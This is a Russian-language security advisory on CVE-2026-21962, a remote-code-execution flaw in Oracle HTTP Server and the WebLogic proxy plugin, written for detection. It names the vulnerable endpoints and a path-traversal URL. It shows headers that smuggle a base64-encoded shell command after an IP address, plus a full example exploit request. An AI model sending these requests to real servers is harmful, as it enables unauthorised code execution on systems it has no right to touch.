Критическая уязвимость в Oracle-Fusion-Middleware CVE-2026-21962 CVE-2026-21962 — уязвимость удаленного выполнения кода (RCE) в Oracle Fusion Middleware, которые используют Oracle HTTP Server и плагин WebLogic Server Proxy для переадресации веб-трафика на серверы бэкенд-приложений. Уязвимость затрагивает Oracle HTTP Server и плагин WebLogic Server Proxy для Apache HTTP Server и IIS в версиях 12.2.1.4.0, 14.1.1.0.0 и 14.1.2.0.0 (для IIS-версии плагина — только 12.2.1.4.0). 👍 Метрики Base Score: 10.0 CRITICAL CWE: CWE-284 👍 Сканирование и эксплуатация Кроме сканеров уязвимых версий в публичном пространстве появляются скрипты с попытками эксплуатации. Вот что информативного можно выделить в этих эксплоитах. Уязвимые конечные точки: "/weblogic/", "/wl_proxy/", "/bea_wls_internal/", "/_proxy/", "/proxy/" Специфические URL: /weblogic/..;/bea_wls_internal/ProxyServlet Заголовки: "WL-Proxy-Client-IP": f"127.0.0.1;{encoded_payload}", "Proxy-Client-IP": f"127.0.0.1;{encoded_payload}", "X-Forwarded-For": f"127.0.0.1;{encoded_payload}", encoded_payload — закодированная в base64 shell-команда. Пример запроса: GET /weblogic/weblogic/..;/bea_wls_internal/ProxyServlet HTTP/1.1 Host: localhost:7001 User-Agent: Mozilla/5.0 (compatible; Exploit/1.0) Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive WL-Proxy-Client-IP: 127.0.0.1;Y21kOmlk X-Forwarded-For: 127.0.0.1;Y21kOmlk 👍 Как происходит сканирование Отправляется запрос на {конечная точка}/weblogic/..;/bea_wls_internal/ProxyServlet. Если сервер отвечает статус-кодом 200, то запрос отправляется на эту же конечную точку с установленными заголовками. 👍 Как защититься Для детектирования подобных сканеров можно написать правило на WAF/IDS , блокирующее GET/POST-запросы на уязвимые конечные точки, в URL которых передаются попытки выхода за пределы каталога ../ ..; а в заголовках — строка с кодировкой base64.